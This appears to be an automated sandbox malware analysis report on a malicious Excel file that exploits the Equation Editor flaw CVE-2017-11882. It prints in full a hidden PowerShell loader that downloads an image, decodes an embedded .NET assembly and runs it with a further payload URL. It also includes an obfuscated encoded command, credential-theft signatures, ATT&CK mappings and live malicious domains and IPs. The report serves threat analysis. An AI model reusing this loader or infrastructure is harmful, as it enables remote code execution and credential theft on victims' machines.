            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\onsandtigerbeautifulpicture.vbs"
            Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = '…
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634', 'https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.EWH/005001/451.871.64.891//:ptth' , '1' , 'C:\ProgramData\' , 'incontrovertido','RegAsm',''))} }"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden Copy-Item -Path *.vbs -Destination C:\ProgramData\incontrovertido.vbs
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe"
            Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command "$codigo = 'zgb1dgtreg4dgtreywb0dgtregkdgtrebwbudgtrecdgtredgtrerdgtrebvdgtrehcdgtrebgbsdgtreg8dgtreyqbkdgtreeqdgtreyqb0dgtregedgtrergbydgtreg8dgtrebqbmdgtregkdgtrebgbrdgtrehmdgtreidgtreb7dgtrecdgtredgtrecdgtrebhdgtrehidgtreyqbtdgtrecdgtredgtrekdgtrebbdgtrehmdgtreddgtrebydgtregkdgtrebgbndgtrefsdgtrexqbddgtrecqdgtrebdgtrebpdgtreg4dgtreawbzdgtreckdgtreidgtredgtrekdgtrehcdgtrezqbidgtreemdgtrebdgtrebpdgtregudgtrebgb0dgtrecdgtredgtrepqdgtregdgtree4dgtrezqb3dgtrec0dgtretwbidgtregodgtrezqbjdgtrehqdgtreidgtrebtdgtrehkdgtrecwb0dgtregudgtrebqdgtreudgtree4dgtrezqb0dgtrec4dgtrevwbldgtregidgtreqwbsdgtregkdgtrezqbudgtrehqdgtreowdgtregdgtrecqdgtrezdgtrebvdgtrehcdgtrebgbsdgtreg8dgtreyqbkdgtregudgtrezdgtrebedgtregedgtreddgtrebhdgtrecdgtredgtrepqdgtregdgtreedgtredgtrekdgtredgtrepdgtredsdgtreidgtredgtrekdgtrehmdgtreadgtreb1dgtregydgtrezgbsdgtregudgtrezdgtrebmdgtregkdgtrebgbrdgtrehmdgtreidgtredgtre9dgtrecdgtredgtrejdgtrebsdgtregkdgtrebgbrdgtrehmdgtreidgtreb8dgtrecdgtredgtrerwbldgtrehqdgtrelqbsdgtregedgtrebgbkdgtreg8dgtrebqdgtregdgtrec0dgtreqwbvdgtrehudgtrebgb0dgtrecdgtredgtrejdgtrebsdgtregkdgtrebgbrdgtrehmdgtrelgbmdgtregudgtrebgbndgtrehqdgtreadgtredgtre7dgtrecdgtredgtrezgbvdgtrehidgtrezqbhdgtregmdgtreadgtredgtregdgtrecgdgtrejdgtrebsdgtregkdgtrebgbrdgtrecdgtredgtreaqbudgtrecdgtredgtrejdgtrebzdgtreggdgtredqbmdgtregydgtrebdgtrebldgtregqdgtretdgtrebpdgtreg4dgtreawbzdgtreckdgtreidgtreb7dgtrecdgtredgtreddgtrebydgtrehkdgtreidgtreb7dgtrecdgtredgtrejdgtrebkdgtreg8dgtredwbudgtregwdgtrebwbhdgtregqdgtrezqbkdgtreeqdgtreyqb0dgtregedgtreidgtredgtrerdgtred0dgtreidgtredgtrekdgtrehcdgtrezqbidgtreemdgtrebdgtrebpdgtregudgtrebgb0dgtrec4dgtrerdgtrebvdgtrehcdgtrebgbsdgtreg8dgtreyqbkdgtreeqdgtreyqb0dgtregedgtrekdgtredgtrekdgtregwdgtreaqbudgtregsdgtrekqdgtregdgtreh0dgtreidgtrebjdgtregedgtreddgtrebjdgtreggdgtreidgtreb7d
gtrecdgtredgtreywbvdgtreg4dgtreddgtrebpdgtreg4dgtredqbldgtrecdgtredgtrefqdgtregdgtreh0dgtreowdgtregdgtrehidgtrezqb0dgtrehudgtrecgbudgtrecdgtredgtrejdgtrebkdgtreg8dgtredwbudgtregwdgtrebwbhdgtregqdgtrezqbkdgtreeqdgtreyqb0dgtregedgtreidgtreb9dgtredsdgtreidgtredgtrekdgtregwdgtreaqbudgtregsdgtrecwdgtregdgtred0dgtreidgtrebdgtredgtrecgdgtrejwbodgtrehqdgtreddgtrebwdgtrehmdgtreogdgtrevdgtrec8dgtredqbwdgtregwdgtrebwbhdgtregqdgtrezdgtrebldgtregkdgtrebqbhdgtregcdgtrezqbudgtrehmdgtrelgbjdgtreg8dgtrebqdgtreudgtregidgtrecgdgtrevdgtregkdgtrebqbhdgtregcdgtrezqbzdgtrec8dgtremdgtredgtrewdgtredqdgtrelwdgtre3dgtredgdgtrenqdgtrevdgtredcdgtremgdgtrewdgtrec8dgtrebwbydgtregkdgtrezwbpdgtreg4dgtreyqbsdgtrec8dgtrebgbldgtrehcdgtrexwbpdgtreg0dgtreyqbndgtregudgtrelgbqdgtrehdgtredgtrezwdgtre/dgtrededgtrenwdgtrexdgtredydgtremwdgtrewdgtredcdgtrengdgtrezdgtredqdgtrejwdgtresdgtrecdgtredgtrejwbodgtrehqdgtreddgtrebwdgtrehmdgtreogdgtrevdgtrec8dgtredqbwdgtregwdgtrebwbhdgtregqdgtrezdgtrebldgtregkdgtrebqbhdgtregcdgtrezqbudgtrehmdgtrelgbjdgtreg8dgtrebqdgtreudgtregidgtrecgdgtrevdgtregkdgtrebqbhd
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "function downloaddatafromlinks { param ([string[]]$links) $webclient = new-object system.net.webclient; $downloadeddata = @(); $shuffledlinks = $links | get-random -count $links.length; foreach ($link in $shuffledlinks) { try { $downloadeddata += $webclient.downloaddata($link) } catch { continue } }; return $downloadeddata }; $links = @('https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634', 'https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634'); $imagebytes = downloaddatafromlinks $links; if ($imagebytes -ne $null) { $imagetext = [system.text.encoding]::utf8.getstring($imagebytes); $startflag = '<<base64_start>>'; $endflag = '<<base64_end>>'; $startindex = $imagetext.indexof($startflag); $endindex = $imagetext.indexof($endflag); if ($startindex -ge 0 -and $endindex -gt $startindex) { $startindex += $startflag.length; $base64length = $endindex - $startindex; $base64command = $imagetext.substring($startindex, $base64length); $commandbytes = [system.convert]::frombase64string($base64command); $loadedassembly = [system.reflection.assembly]::load($commandbytes); $type = $loadedassembly.gettype('projetoautomacao.vb.home'); $method = $type.getmethod('vai').invoke($null, [object[]] ('txt.ewh/005001/451.871.64.891//:ptth' , '1' , 'c:\programdata\' , 'incontrovertido','regasm',''))} }"
            Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command "$codigo = '[obfuscated encoded payload omitted]
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "function downloaddatafromlinks { param ([string[]]$links) $webclient = new-object system.net.webclient; $downloadeddata = @(); $shuffledlinks = $links | get-random -count $links.length; foreach ($link in $shuffledlinks) { try { $downloadeddata += $webclient.downloaddata($link) } catch { continue } }; return $downloadeddata }; $links = @('https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634', 'https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634'); $imagebytes = downloaddatafromlinks $links; if ($imagebytes -ne $null) { $imagetext = [system.text.encoding]::utf8.getstring($imagebytes); $startflag = '<<base64_start>>'; $endflag = '<<base64_end>>'; $startindex = $imagetext.indexof($startflag); $endindex = $imagetext.indexof($endflag); if ($startindex -ge 0 -and $endindex -gt $startindex) { $startindex += $startflag.length; $base64length = $endindex - $startindex; $base64command = $imagetext.substring($startindex, $base64length); $commandbytes = [system.convert]::frombase64string($base64command); $loadedassembly = [system.reflection.assembly]::load($commandbytes); $type = $loadedassembly.gettype('projetoautomacao.vb.home'); $method = $type.getmethod('vai').invoke($null, [object[]] ('txt.ewh/005001/451.871.64.891//:ptth' , '1' , 'c:\programdata\' , 'incontrovertido','regasm',''))} }"
            Source: RegAsm.exe, 00000011.00000002.1078551055.00000000008EF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Manager97\-P
            Source: RegAsm.exe, 00000011.00000002.1078551055.00000000008B1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: program Manager
            Source: RegAsm.exe, 00000011.00000002.1078551055.00000000008B1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Manager Ref19920830281982938RT [Compatibility Mode]
            Source: RegAsm.exe, 00000011.00000002.1078551055.00000000008B1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: |Program Manager|
            Source: nots.dat.17.dr Binary or memory string: [Program Manager]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 17_2_00434C52 cpuid 17_2_00434C52
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: EnumSystemLocalesW,17_2_00452036
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,17_2_004520C3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: GetLocaleInfoW,17_2_00452313
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: EnumSystemLocalesW,17_2_00448404
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,17_2_0045243C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: GetLocaleInfoW,17_2_00452543
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,17_2_00452610
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: GetLocaleInfoA,17_2_0040F8D1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: GetLocaleInfoW,17_2_004488ED
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: IsValidCodePage,GetLocaleInfoW,17_2_00451CD8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: EnumSystemLocalesW,17_2_00451F50
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: EnumSystemLocalesW,17_2_00451F9B
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 17_2_00448957 GetSystemTimeAsFileTime,17_2_00448957
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 17_2_0041B60D GetUserNameW,17_2_0041B60D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 17_2_00449190 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,17_2_00449190
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

            Stealing of Sensitive Information

            Source: Yara match File source: 17.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 17.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match File source: 12.2.powershell.exe.465ae68.1.unpack, type: UNPACKEDPE
            Source: Yara match File source: 12.2.powershell.exe.465ae68.1.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000011.00000002.1078551055.00000000008B1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 0000000C.00000002.466787853.0000000004477000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: Process Memory Space: powershell.exe PID: 3608, type: MEMORYSTR
            Source: Yara match File source: Process Memory Space: RegAsm.exe PID: 3972, type: MEMORYSTR
            Source: Yara match File source: C:\Users\user\AppData\Local\Temp\note\nots.dat, type: DROPPED
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: \AppData\Local\Google\Chrome\User Data\Default\Login Data 17_2_0040BA12
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: \AppData\Roaming\Mozilla\Firefox\Profiles\ 17_2_0040BB30
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: \key3.db 17_2_0040BB30

            Remote Access Functionality

            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Mutex created: \Sessions\1\BaseNamedObjects\Rmc-999Z97
            Source: Yara match File source: 17.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 17.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match File source: 12.2.powershell.exe.465ae68.1.unpack, type: UNPACKEDPE
            Source: Yara match File source: 12.2.powershell.exe.465ae68.1.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000011.00000002.1078551055.00000000008B1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 0000000C.00000002.466787853.0000000004477000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: Process Memory Space: powershell.exe PID: 3608, type: MEMORYSTR
            Source: Yara match File source: Process Memory Space: RegAsm.exe PID: 3972, type: MEMORYSTR
            Source: Yara match File source: C:\Users\user\AppData\Local\Temp\note\nots.dat, type: DROPPED
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: cmd.exe 17_2_0040569A
            | Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
            |---|---|---|---|---|---|---|---|---|---|---|---|---|---|
            | Gather Victim Identity Information | 131 Scripting | Valid Accounts | 1 Native API | 131 Scripting | 1 DLL Side-Loading | 1 Deobfuscate/Decode Files or Information | 1 OS Credential Dumping | 2 System Time Discovery | Remote Services | 11 Archive Collected Data | 1 Web Service | Exfiltration Over Other Network Medium | 1 System Shutdown/Reboot |
            | Credentials | Domains | Default Accounts | 43 Exploitation for Client Execution | 1 DLL Side-Loading | 1 Bypass User Account Control | 21 Obfuscated Files or Information | 211 Input Capture | 1 Account Discovery | Remote Desktop Protocol | 211 Input Capture | 15 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service |
            | Email Addresses | DNS Server | Domain Accounts | 12 Command and Scripting Interpreter | 1 Windows Service | 1 Access Token Manipulation | 1 Install Root Certificate | 2 Credentials In Files | 1 System Service Discovery | SMB/Windows Admin Shares | 3 Clipboard Data | 21 Encrypted Channel | Automated Exfiltration | Data Encrypted for Impact |
            | Employee Names | Virtual Private Server | Local Accounts | 2 Service Execution | 11 Registry Run Keys / Startup Folder | 1 Windows Service | 1 DLL Side-Loading | NTDS | 3 File and Directory Discovery | Distributed Component Object Model | Input Capture | 1 Non-Standard Port | Traffic Duplication | Data Destruction |
            | Gather Victim Network Information | Server | Cloud Accounts | 3 PowerShell | Network Logon Script | 322 Process Injection | 1 Bypass User Account Control | LSA Secrets | 34 System Information Discovery | SSH | Keylogging | 1 Remote Access Software | Scheduled Transfer | Data Encrypted for Impact |
            | Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | 11 Registry Run Keys / Startup Folder | 1 Masquerading | Cached Domain Credentials | 2 Security Software Discovery | VNC | GUI Input Capture | 3 Non-Application Layer Protocol | Data Transfer Size Limits | Service Stop |
            | DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 1 Modify Registry | DCSync | 21 Virtualization/Sandbox Evasion | Windows Remote Management | Web Portal Capture | 214 Application Layer Protocol | Exfiltration Over C2 Channel | Inhibit System Recovery |
            | Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 21 Virtualization/Sandbox Evasion | Proc Filesystem | 3 Process Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement |
            | Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 1 Access Token Manipulation | /etc/passwd and /etc/shadow | 1 Application Window Discovery | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement |
            | IP Addresses | Compromise Infrastructure | Supply Chain Compromise | PowerShell | Cron | Cron | 322 Process Injection | Network Sniffing | 1 System Owner/User Discovery | Shared Webroot | Local Data Staging | File Transfer Protocols | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | External Defacement |
            | Network Security Appliances | Domains | Compromise Software Dependencies and Development Tools | AppleScript | Launchd | Launchd | Stripped Payloads | Input Capture | 1 Remote System Discovery | Software Deployment Tools | Remote Data Staging | Mail Protocols | Exfiltration Over Unencrypted Non-C2 Protocol | Firmware Corruption |
            [Behavior graph] Behavior Graph ID: 1447833, Sample: Ref19920830281982938RT.xls, Startdate: 27/05/2024, Architecture: WINDOWS, Score: 100

            | Source | Detection | Scanner | Label | Link |
            |---|---|---|---|---|
            | Ref19920830281982938RT.xls | 5% | ReversingLabs | | |
            | Ref19920830281982938RT.xls | 8% | Virustotal | | Browse |
            | Source | Detection | Scanner | Label | Link |
            |---|---|---|---|---|
            | C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\lioniskingandtigerisalsotryingforkingbutdifferentistheattitudeofthistwoanimalaredifferentlionsisalwaysalionitsucantcomparewith__anyotherbecauselionbeauties[1].doc | 100% | Avira | HEUR/Rtf.Malformed | |
            | C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A9EAB33D.doc | 100% | Avira | HEUR/Rtf.Malformed | |
            | C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{8D0975D7-21A3-4DB8-9D99-C358C75C774D}.tmp | 100% | Avira | EXP/CVE-2017-11882.Gen | |
            No Antivirus matches
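            | Source | Detection | Scanner | Label | Link |
            |---|---|---|---|---|
            | sembe.duckdns.org | 13% | Virustotal | | Browse |
            | paste.ee | 3% | Virustotal | | Browse |
            | z2.ink | 4% | Virustotal | | Browse |
            | geoplugin.net | 0% | Virustotal | | Browse |
            | uploaddeimagens.com.br | 5% | Virustotal | | Browse |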
            | Source | Detection | Scanner | Label | Link |
            |---|---|---|---|---|
            | http://nuget.org/NuGet.exe | 0% | URL Reputation | safe | |
            | http://crl.entrust.net/server1.crl0 | 0% | URL Reputation | safe | |
            | http://ocsp.entrust.net03 | 0% | URL Reputation | safe | |
            | https://contoso.com/License | 0% | URL Reputation | safe | |
            | https://contoso.com/Icon | 0% | URL Reputation | safe | |
            | http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0 | 0% | URL Reputation | safe | |
            | https://analytics.paste.ee | 0% | URL Reputation | safe | |
            | http://www.diginotar.nl/cps/pkioverheid0 | 0% | URL Reputation | safe | |
            | http://geoplugin.net/json.gp | 100% | URL Reputation | phishing | |
            | http://crl.pkioverheid.nl/DomOvLatestCRL.crl0 | 0% | URL Reputation | safe | |
            | http://geoplugin.net/json.gp/C | 100% | URL Reputation | phishing | |
            | https://contoso.com/ | 0% | URL Reputation | safe | |
            | https://nuget.org/nuget.exe | 0% | URL Reputation | safe | |
            | http://ocsp.entrust.net0D | 0% | URL Reputation | safe | |
            | http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe | |
            | https://secure.comodo.com/CPS0 | 0% | URL Reputation | safe | |
            | https://secure.gravatar.com | 0% | URL Reputation | safe | |
            | https://themes.googleusercontent.com | 0% | URL Reputation | safe | |
            | http://crl.entrust.net/2048ca.crl0 | 0% | URL Reputation | safe | |
            | http://z2.ink/nLNG | 0% | Avira URL Cloud | safe | |
            | http://198.46.178.154/100500/HWE.txt | 0% | Avira URL Cloud | safe | |
            | http://198.46.178.154/100500/vff/lioniskingandtigerisalsotryingforkingbutdifferentistheattitudeofthistwoanimalaredifferentlionsisalwaysalionitsucantcomparewith__anyotherbecauselionbeauties.doc | 0% | Avira URL Cloud | safe | |
            | https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634 | 100% | Avira URL Cloud | malware | |
            | https://paste.ee/d/iuC2i | 0% | Avira URL Cloud | safe | |
            | https://www.google.com; | 0% | Avira URL Cloud | safe | |
            | http://198.46.178.154/100500/lionsandtigerbeautifulpicture.bmpj | 0% | Avira URL Cloud | safe | |
            | https://paste.ee/d/iuC2igv | 0% | Avira URL Cloud | safe | |
            | http://198.46.178.154/100500/vff/lioniskingandtigerisalsotryingforkingbutdifferentistheattitudeofthistwoanimalaredifferentlionsisalwaysalionitsucantcomparewith__anyotherbecauselionbeauties.doc | 7% | Virustotal | | Browse |
            | http://198.46.178.154/100500/HWE.txt | 7% | Virustotal | | Browse |
            | http://z2.ink/nLNG | 4% | Virustotal | | Browse |
            | https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634 | 13% | Virustotal | | Browse |
            | https://paste.ee/e | 0% | Avira URL Cloud | safe | |
            | http://z2.ink/nLNGyX | 0% | Avira URL Cloud | safe | |
            | http://198.46.178.154/100500/lionsandtigerbeautifulpicture.bmp | 0% | Avira URL Cloud | safe | |
            | https://paste.ee/d/iuC2i | 3% | Virustotal | | Browse |
            | http://198.46.178.154/100500/lionsandtigerbeautifulpicture.bmpj | 7% | Virustotal | | Browse |
            | sembe.duckdns.org | 0% | Avira URL Cloud | safe | |
            | http://z2.ink/nLNGyX | 4% | Virustotal | | Browse |
            | https://www.google.com | 0% | Avira URL Cloud | safe | |
            | https://paste.ee/e | 2% | Virustotal | | Browse |
            | https://uploaddeimagens.com.br/images/00 | 0% | Avira URL Cloud | safe | |
            | https://uploaddeimagens.com.br | 0% | Avira URL Cloud | safe | |
            | https://analytics.paste.ee; | 0% | Avira URL Cloud | safe | |
            | https://www.google.com | 0% | Virustotal | | Browse |
            | https://cdnjs.cloudflare.com | 0% | Avira URL Cloud | safe | |
            | https://uploaddeimagens.com.br/images/00 | 3% | Virustotal | | Browse |
            | https://cdnjs.cloudflare.com; | 0% | Avira URL Cloud | safe | |
            | http://z2.ink/ | 0% | Avira URL Cloud | safe | |
            | https://uploaddeimagens.com.br | 7% | Virustotal | | Browse |
            | sembe.duckdns.org | 13% | Virustotal | | Browse |
            | http://198.46.178.154/100500/lionsandtigerbeautifulpicture.bmpw | 0% | Avira URL Cloud | safe | |
            | https://cdnjs.cloudflare.com | 0% | Virustotal | | Browse |
            | http://198.46.178.154/100500/lionsandtigerbeautifulpicture.bmp | 7% | Virustotal | | Browse |
            | http://z2.ink/ | 4% | Virustotal | | Browse |
            | Name | IP | Active | Malicious | Antivirus Detection | Reputation |
            |---|---|---|---|---|---|
            | sembe.duckdns.org | 194.187.251.115 | true | true | | unknown |
            | paste.ee | 188.114.97.3 | true | true | | unknown |
            | z2.ink | 54.241.153.192 | true | true | | unknown |
            | geoplugin.net | 178.237.33.50 | true | false | | unknown |
            | uploaddeimagens.com.br | 188.114.97.3 | true | true | | unknown |
            | Name | Malicious | Antivirus Detection | Reputation |
            |---|---|---|---|
            | https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634 | true | 13%, Virustotal, Browse; Avira URL Cloud: malware | unknown |
            | https://paste.ee/d/iuC2i | true | 3%, Virustotal, Browse; Avira URL Cloud: safe | unknown |
            | http://198.46.178.154/100500/vff/lioniskingandtigerisalsotryingforkingbutdifferentistheattitudeofthistwoanimalaredifferentlionsisalwaysalionitsucantcomparewith__anyotherbecauselionbeauties.doc | true | 7%, Virustotal, Browse; Avira URL Cloud: safe | unknown |
            | http://z2.ink/nLNG | false | 4%, Virustotal, Browse; Avira URL Cloud: safe | unknown |
            | http://198.46.178.154/100500/HWE.txt | true | 7%, Virustotal, Browse; Avira URL Cloud: safe | unknown |
            | http://198.46.178.154/100500/lionsandtigerbeautifulpicture.bmp | true | 7%, Virustotal, Browse; Avira URL Cloud: safe | unknown |
            | http://geoplugin.net/json.gp | true | URL Reputation: phishing | unknown |
            | sembe.duckdns.org | true | 13%, Virustotal, Browse; Avira URL Cloud: safe | unknown |
            NameSourceMaliciousAntivirus DetectionReputation
            http://nuget.org/NuGet.exepowershell.exe, 0000000C.00000002.466787853.0000000003799000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            • URL Reputation: safe
            unknown
            http://crl.entrust.net/server1.crl0wscript.exe, 00000009.00000003.432521109.0000000003AD2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.431629042.0000000003AD3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.431571140.0000000003AD0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.431892049.0000000003AD2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.436432327.0000000003AD3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.431591415.0000000003AD3000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.477785176.0000000005030000.00000004.00000020.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            unknown
